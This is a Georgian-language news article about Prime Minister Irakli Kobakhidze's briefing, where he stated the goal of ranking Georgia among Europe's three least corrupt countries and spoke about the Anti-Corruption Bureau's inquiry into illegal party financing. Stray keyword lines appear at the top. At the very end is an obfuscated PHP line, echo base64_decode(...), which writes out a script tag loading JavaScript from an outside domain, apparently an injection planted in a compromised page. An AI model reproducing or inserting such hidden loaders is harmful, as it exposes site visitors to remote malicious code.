celsiusi
ავერსი შნაიდერი

 მე მაქვს გაცხადებული ამბიციური მიზანი, რომ საქართველომ ევროპის ქვეყნების სამეულში დაიკავოს ადგილი კორუფციის სიმცირის თვალსაზრისით, - ამის შესახებ ირაკლი კობახიძემ დღევანდელ ბრიფინგზე განაცხადა.

როგორც მთავრობის მეთაურმა აღნიშნა, მთავარი ვინც პასუხისმგებელია ამ ქვეყანაში კორუფციასთან ბრძოლაზე, არის სწორედ მთავრობა და პრემიერ-მინისტრი.

„ანტიკორუფციულ ბიუროს ევალება, გამოიკვლიოს ნებისმიერი ფაქტი, რაც შეიძლება, უკავშირდებოდეს პარტიების არალეგალურ დაფინანსებას და აქ იკვეთება რეალურად არჩევნების არალეგალური დაფინანსების ნიშნები, თუმცა ამას დაადგენს საბოლოოდ შესაბამისი სამსახური. რაც შეეხება სხვა მიმართულებით ამ ბიუროს მუშაობას, ახალი შექმნილია ეს ბიურო და კითხვები ბიუროს მიმართ უნდა დაისვას ყველა საკითხთან დაკავშირებით.

კორუფციასთან ბრძოლას რაც შეეხება, მე მაქვს გაცხადებული ამბიციური მიზანი, ჩემი პირადი მიზანია, რომ საქართველომ ევროპის ქვეყნების სამეულში დაიკავოს ადგილი კორუფციის სიმცირის თვალსაზრისით. 8 თებერვლიდან მოყოლებული ათასობით განკარგულებაა გამოქვეყნებული, უკლებლივ ყველა სამთავრობო განკარგულება არის გამოქვეყნებული მთავრობის საიტზე შეგიძლიათ იხილოთ, თუ რომელიმე სამთავრობო გადაწყვეტილებიდან თქვენ ამოიკითხავთ კორუფციის ნიშანს, მე პირადად ვარ პასუხისმგებელი იმაზე, რომ გვექნება უმკაცრესი რეაგირება, თუმცა დღემდე არც ერთი ასეთი პრეტენზია არ ყოფილა წაყენებული. მთავარი ვინც არის პასუხისმგებელი ამ ქვეყანაში კორუფციასთან ბრძოლაზე, არის სწორედ მთავრობა და პრემიერ-მინისტრი. პირველ რიგში ჩემს საქმიანობას დააკვირდით, როცა საქმე ეხება კორუფციის შემცირებას საქართველოში“, - განაცხადა ირაკლი კობახიძემ.

101
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");